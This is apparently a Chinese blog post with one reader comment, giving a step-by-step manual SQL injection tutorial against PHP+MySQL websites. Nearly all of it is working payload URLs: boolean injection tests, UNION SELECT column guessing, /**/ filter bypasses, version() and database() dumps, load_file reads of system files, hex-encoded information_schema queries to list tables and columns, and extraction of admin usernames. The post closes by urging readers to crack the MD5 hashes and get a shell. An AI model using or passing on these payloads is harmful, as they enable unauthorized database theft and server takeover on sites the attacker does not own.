题外话:据传PR月底会更新,不能和前段时间一样懒了,多写点东西骗一骗蜘蛛。
当然这些东西都是自己重新整理过的,不是简单的Crtl+C、Ctrl+V。

1.可注入的格式类型
不管是asp、aspx、php,可注入的格式必为动态链接,即:

http://www.llsilver.com/test.asp?id=*

http://www.llsilver.com/test.aspx?id=*

http://www.llsilver.com/test.php?id=*

2.判断是否存在注入(现在的很多站点都普遍加入了防注入或者容错语句)
对于大部分的asp、aspx、php,注入点的判断都是这样的,即:

http://www.llsilver.com/news/show.php?id=26 and 1=1返回正常页
http://www.llsilver.com/news/show.php?id=26 and 1=2返回错误页

当同一个链接and 1=1和and 1=2返回页面如上所述时即存在注入。
这里是用的and来判断的,有时候会过滤and,可以尝试着使用or注入,or注入和and注入刚好相反,意思就是or 1=1和or 1=2在上述连接中的正常页和错误页刚好相反,自己多尝试几遍就能理解了。

3.猜解准确字段数(不明白原理的自己去查找这方面的文章,其实本大王也不明白的。(*^__^*) )
利用union来查询准确字段,如: and 1=2 union select  1,2,3,…….直到返回正常,说明猜到准确字段数。
如过滤了空格可以用 /**/代替,即and/**/1=2/**/union/**/select/**/ 1,2,3

http://www.llsilver.com/news.php?id=999 and 1=2 union select 1,2,3
http://www.llsilver.com/news.php?id=999/**/and/**/1=2/**/union/**/select/**/1,2,3

4.mysql也有内置变量,可以帮助我们获得更多信息
version()返回当前数据库版本信息,database() 返回当前数据库名,user(),返回MYSQL用户名,可以帮助我们获得更多信息。
这些都是很基础的东西,命令如下(命令末尾的数字3为刚刚上面所判断出的字段数,自行填写):
http://www.llsilver.com/news.php?id=999 and 1=2 union select version(),database(),3 –

http://www.llsilver.com/news.php?id=999 and 1=2 union select 1,2,version(),4,5,6,7
Load_file可以返回文件的内容
(1),读取系统信息
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Windows Server 2003, Enterprise” /fastdetect /NoExecute=OptOut multi(0)disk(0)rdisk(1)partition(1)\WINDOWS=”Boot Mirror C: – secondary plex” multi(0)disk(0)rdisk(1)partition(1)\WINDOWS=”Boot Mirror C: – secondary plex”

(2)读取php配置信息

我们转化一下,
load_file(‘c:\boot.ini’)=load_file(char(99,58,92,98,111,111,116,46,105,110,105))
5.猜解表(PHP+MySQL5.*版本的猜解很有意思)
刚刚上述所说到and 1=2 union select version(),database(),3 –判断MySQL版本和库。
我们只需将查询到的库改为16进制,如llsilver的16进制为0x6C6C73696C766572,则在地址栏中写入
http://www.llsilver.com/news.php?id=999 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=0x6C6C73696C766572 limit 5,1–

这样既可迅速爆出管理员表(本大王这里将管理员表假设为admin)

6.猜解表中的字段
admin的16进制为0x61646D696E
http://www.llsilver.com/news.php?id=999 and 1=2 union select 1,column_name,3 from information_schema.columns where table_name=0x61646D696E limit 1,1–

这样既可爆出字段(假设为name)

7.暴管理员的用户名
http://www.llsilver.com/news.php?id=999 and 1=2 union select name,3 from admin

剩下的解密得到的MD5,然后进后台拿Shell了。

本文来源于:技术文章。转载请保留这个链接,不会对你的SEO大业产生影响。

2 回应 至“”PHP+MySQL手工注入”

  1. TTkea says:
    2010年06月23日 at 上午 12:23

    PR大概快更新了吧,还有,大牛啊,多发点系统点的,基础点的东西出来吧,我学学~~~
    .-= vmware workstation 虚拟机安装 VMware Tools =-.

    回复

留下回复